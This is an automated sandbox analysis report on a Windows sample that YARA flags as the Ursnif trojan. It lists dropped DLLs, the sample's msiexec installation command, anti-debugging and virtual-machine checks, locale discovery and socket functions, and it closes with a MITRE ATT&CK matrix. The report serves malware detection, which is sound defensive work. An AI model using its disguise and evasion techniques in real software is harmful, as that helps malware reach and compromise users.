
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe TID: 4660	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe TID: 6480	Thread sleep time: -30000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe TID: 6424	Thread sleep time: -240000s >= -30000s	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe TID: 4552	Thread sleep count: 42 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe TID: 4552	Thread sleep count: 32 > 30	Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe TID: 4552	Thread sleep count: 32 > 30	Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\icuio58.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\libeay32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI15F0.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\SslCertBinding.Net.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\System.Threading.Tasks.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ICSharpCode.SharpZipLib.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\AWSSDK.SimpleDB.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Microsoft.Azure.KeyVault.Core.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1488.tmp	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\libeay32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\AWSSDK.SimpleDB.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ssleay32.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\ICSharpCode.SharpZipLib.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\Delimon.Win32.IO.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\icuio58.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Microsoft.Azure.KeyVault.Core.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\SslCertBinding.Net.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Windows\Installer\MSI1815.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\ssleay32.dll	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\shi7515.tmp	Jump to dropped file
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\Delimon.Win32.IO.dll	Jump to dropped file
Source: C:\Windows\System32\msiexec.exe	Dropped PE file which has not been started: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\System.Threading.Tasks.dll	Jump to dropped file

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Thread delayed: delay time: 240000

Jump to behavior

Source: C:\Windows\System32\msiexec.exe

Process information queried: ProcessInformation

Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01342910 FindFirstFileW,FindClose,	1_2_01342910
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01345B80 FindFirstFileW,FindClose,CloseHandle,CloseHandle,CloseHandle,CreateEventW,CreateThread,WaitForSingleObject,GetExitCodeThread,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,CloseHandle,	1_2_01345B80
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01346A30 FindFirstFileW,FindClose,	1_2_01346A30
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013294D0 FindFirstFileW,GetLastError,FindClose,	1_2_013294D0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_012A8740 FindClose,PathIsUNCW,FindFirstFileW,GetFullPathNameW,GetFullPathNameW,FindClose,SetLastError,PathIsUNCW,	1_2_012A8740
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013529C0 FindFirstFileW,FindClose,	1_2_013529C0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013640F0 FindFirstFileW,FindNextFileW,FindFirstFileW,FindNextFileW,FindNextFileW,FindClose,	1_2_013640F0
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_01328B70 FindFirstFileW,FindFirstFileW,FindFirstFileW,FindClose,FindClose,	1_2_01328B70

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Thread delayed: delay time: 30000			Jump to behavior
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Thread delayed: delay time: 240000			Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	File Volume queried: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4 FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	File Volume queried: C:\ FullSizeInformation	Jump to behavior

Source: MSI79F9.tmp.1.dr	Binary or memory string: RegOpenKeyTransactedW::NetUserGetInfo() failed with error: \@invalid string_view positionVMware, Inc.VMware Virtual PlatformVMware7,1innotek GmbHVirtualBoxMicrosoft CorporationVirtual MachineVRTUALACRSYSA M IGetting system informationManufacturer [Model [BIOS [\\?\UNC\\\?\shim_clone%d.%d.%d.%dDllGetVersion[%!]%!ProgramFilesFolderCommonFilesFolderDesktopFolderAllUsersDesktopFolderAppDataFolderFavoritesFolderStartMenuFolderProgramMenuFolderStartupFolderFontsFolderLocalAppDataFolderCommonAppDataFolderProgramFiles64FolderProgramFilesProgramW6432SystemFolderSystem32FolderWindowsFolderWindowsVolumeTempFolderSETUPEXEDIRshfolder.dllSHGetFolderPathWProgramFilesAPPDATAPROGRAMFILES&+
Source: o4c8AUtX1g.exe, 00000001.00000002.723935810.0000000003B5A000.00000004.00000001.sdmp	Binary or memory string: Hyper-V RAW

Anti Debugging:

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_013C03A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

1_2_013C03A3

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_0135BAD0 CreateFileW,GetLastError,OutputDebugStringW,OutputDebugStringW,SetFilePointer,FlushFileBuffers,WriteFile,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,OutputDebugStringW,WriteFile,WriteFile,FlushFileBuffers,FlushFileBuffers,WriteFile,FlushFileBuffers,WriteFile,FlushFileBuffers,

1_2_0135BAD0

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_01363D80 LoadLibraryW,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,

1_2_01363D80

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_013B959D GetProcessHeap,HeapFree,InterlockedPushEntrySList,

1_2_013B959D

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013CB05F mov eax, dword ptr fs:[00000030h]	1_2_013CB05F
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013B95CD mov esi, dword ptr fs:[00000030h]	1_2_013B95CD
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013D5DCA mov eax, dword ptr fs:[00000030h]	1_2_013D5DCA
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_6D855BE9 mov eax, dword ptr fs:[00000030h]	9_2_6D855BE9
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C25B18 mov eax, dword ptr fs:[00000030h]	9_2_00C25B18
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C36DDC mov eax, dword ptr fs:[00000030h]	9_2_00C36DDC
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C6AC46 mov eax, dword ptr fs:[00000030h]	9_2_00C6AC46

Source: C:\Windows\System32\msiexec.exe

Process created: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013C03A3 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	1_2_013C03A3
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: 1_2_013BBE30 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	1_2_013BBE30
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_6D837D41 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_6D837D41
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_6D846FED IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_6D846FED
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C29C76 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	9_2_00C29C76
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00C17C2C SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	9_2_00C17C2C

HIPS / PFW / Operating System Protection Evasion:

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Process created: C:\Windows\SysWOW64\msiexec.exe 'C:\Windows\system32\msiexec.exe' /i 'C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi' AI_SETUPEXEPATH=C:\Users\user\Desktop\o4c8AUtX1g.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE='/exenoupdates /forcecleanup /wintime 1635154532 ' AI_EUIMSI=''
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Process created: C:\Windows\SysWOW64\msiexec.exe 'C:\Windows\system32\msiexec.exe' /i 'C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools 3.4.0.2\install\0CE0CF4\adv.msi' AI_SETUPEXEPATH=C:\Users\user\Desktop\o4c8AUtX1g.exe SETUPEXEDIR=C:\Users\user\Desktop\ EXE_CMD_LINE='/exenoupdates /forcecleanup /wintime 1635154532 ' AI_EUIMSI=''			Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_01352DA0 GetCurrentProcess,OpenProcessToken,GetLastError,GetTokenInformation,GetTokenInformation,GetLastError,GetTokenInformation,AllocateAndInitializeSid,EqualSid,FreeSid,GetLastError,FindCloseChangeNotification,

1_2_01352DA0

Source: plcd-player.exe, 00000009.00000002.937406953.00000000019F0000.00000002.00020000.sdmp	Binary or memory string: Program Manager
Source: plcd-player.exe, 00000009.00000002.937406953.00000000019F0000.00000002.00020000.sdmp	Binary or memory string: Shell_TrayWnd
Source: plcd-player.exe, 00000009.00000002.937406953.00000000019F0000.00000002.00020000.sdmp	Binary or memory string: Progman
Source: plcd-player.exe, 00000009.00000002.937406953.00000000019F0000.00000002.00020000.sdmp	Binary or memory string: Progmanlock

Language, Device and Operating System Detection:

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\System32\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\msiexec.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: GetLocaleInfoW,	1_2_013CE806
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	1_2_013D2878
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	1_2_013D20EC
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: EnumSystemLocalesW,	1_2_013D238E
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: EnumSystemLocalesW,	1_2_013D23D9
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	1_2_013D2A4D
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: EnumSystemLocalesW,	1_2_013CE28D
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: EnumSystemLocalesW,	1_2_013D2474
Source: C:\Users\user\Desktop\o4c8AUtX1g.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,RegCloseKey,	1_2_013487A0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	9_2_00C3E1C8
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	9_2_00C3E954
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: GetLocaleInfoW,	9_2_00C36AC1
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	9_2_00C3EB29
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: EnumSystemLocalesW,	9_2_00C3E4B5
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: EnumSystemLocalesW,	9_2_00C3E46A
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: EnumSystemLocalesW,	9_2_00C3E550
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: EnumSystemLocalesW,	9_2_00C3655F

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_013BB9A6 cpuid

1_2_013BB9A6

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Jump to behavior

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_0135FEF0 CreateNamedPipeW,CreateFileW,

1_2_0135FEF0

Source: C:\Users\user\Desktop\o4c8AUtX1g.exe

Code function: 1_2_0135B9F0 GetLocalTime,

1_2_0135B9F0

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe

Code function: 9_2_00A71752 CreateEventA,GetVersion,GetCurrentProcessId,OpenProcess,GetLastError,

9_2_00A71752

Stealing of Sensitive Information:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.913796145.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913762032.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913941910.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.937726154.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913912827.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.914001553.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913978289.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913841738.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913966024.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 4744, type: MEMORYSTR
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.1270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.937676135.0000000003949000.00000004.00000040.sdmp, type: MEMORY

Remote Access Functionality:

Yara detected Ursnif

Show sources

Source: Yara match	File source: 00000009.00000003.913796145.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913762032.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913941910.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000002.937726154.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913912827.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.914001553.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913978289.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913841738.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: 00000009.00000003.913966024.0000000003E68000.00000004.00000040.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: plcd-player.exe PID: 4744, type: MEMORYSTR
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.39494a0.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 9.2.plcd-player.exe.1270000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000009.00000002.937676135.0000000003949000.00000004.00000040.sdmp, type: MEMORY

Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00A910D0 WSAIoctl,bind,PostQueuedCompletionStatus,RtlEnterCriticalSection,RtlLeaveCriticalSection,WSAGetLastError,ioctlsocket,connect,		9_2_00A910D0
Source: C:\Users\user\AppData\Roaming\JDesktop Integration Components (JDIC) Project\JDesktop Tools\plcd-player.exe	Code function: 9_2_00A8F6D0 WSASocketW,setsockopt,bind,getsockname,listen,WSASocketW,connect,accept,ioctlsocket,setsockopt,ioctlsocket,setsockopt,		9_2_00A8F6D0

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Replication Through Removable Media1	Windows Management Instrumentation2	DLL Side-Loading1	DLL Side-Loading1	Disable or Modify Tools1	OS Credential Dumping	System Time Discovery1	Replication Through Removable Media1	Archive Collected Data11	Exfiltration Over Other Network Medium	Ingress Tool Transfer1	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	Modify System Partition
Default Accounts	Native API1	DLL Search Order Hijacking2	DLL Search Order Hijacking2	Deobfuscate/Decode Files or Information11	LSASS Memory	Peripheral Device Discovery11	Remote Desktop Protocol	Data from Removable Media	Exfiltration Over Bluetooth	Encrypted Channel1	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	Command and Scripting Interpreter1	Scheduled Task/Job1	Process Injection3	Obfuscated Files or Information3	Security Account Manager	File and Directory Discovery2	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	Non-Application Layer Protocol1	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	Scheduled Task/Job1	Logon Script (Mac)	Scheduled Task/Job1	Software Packing13	NTDS	System Information Discovery36	Distributed Component Object Model	Input Capture	Scheduled Transfer	Application Layer Protocol1	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	Timestomp1	LSA Secrets	Query Registry1	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	DLL Side-Loading1	Cached Domain Credentials	Security Software Discovery31	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	DLL Search Order Hijacking2	DCSync	Process Discovery2	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
